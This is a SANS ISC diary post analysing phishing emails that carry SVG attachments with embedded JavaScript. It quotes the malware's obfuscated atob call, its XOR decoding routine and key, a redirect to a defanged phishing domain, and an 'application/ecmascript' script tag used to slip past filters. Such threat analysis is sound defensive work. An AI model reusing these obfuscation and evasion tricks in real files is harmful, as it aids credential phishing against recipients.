For a few days, my SANS ISC mailbox is flooded with emails that delivers SVG files. An SVG ("Scalable Vector Graphic") is a web-friendly vector file format used for graphics and icons. No URL in the body, just “an image”, that’s the perfect way to deliver some malicious content. This isn’t the first time that we see this technique used by threat actors[1].
This time, the SVG files are really simple and even don’t contain any graphical element but a simple piece of JavaScript that will redirect the victim's browser to the phishing page:
With the current wave, I just detected regular phishing pages but it could be any payload.
The variable “nl” contains the targeted email address:
nl = '$aGFuZGxlcnNAc2Fucy5lZHU='; // “handlers@sans.edu”
The interesting payload is in “oa”, it contains a Base64-encode and XOR’d string. The XOR key is in “bd”:
const pt = "b19208caeefa"; const rm = "51d1e7dcd384"; const bd = pt + rm;
The payload is decoded here:
const cx = ['b', 'style', 'o', 't', 'a'];
const kf = self[[cx[4], cx[3], cx[2], cx[0]].join('')];
const ts = kf(oa);
const rabbit = Uint8Array.from(ts, (aa, ak) =>
aa.charCodeAt(0) ^ bd.charCodeAt(ak % bd.length)
);
Finally, the variable “rabbit” is used to perform the redirect in the browser:
window.location.href = "hxxps://chinougoo[.]cfd/W74rH61S!x7sbhhS0bKPv/" + "handlers@sans.edu";
This technique works because SVG files are handled by the browser by default on the Windows operating system. Note the TLD used (".cfd") which means "Clothing, Fashion, and Design". It's a cheap TLD more and more abused in phishing campaigns[2].
A final note about the MIME type used in the SVG file:
<script type="application/ecmascript">
This is a official MIME type for ECMAScript, the standardized specification underlying JavaScript (standard ECMA-262)[3]. This has been used probably to defeat some common security controls that are looking for "JavaScript".
[1] https://isc.sans.edu/diary/Increase+In+Phishing+SVG+Attachments/31456
[2] https://radar.cloudflare.com/tlds/cfd?dateRange=7d
[3] https://github.com/sudheerj/ECMAScript-features
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key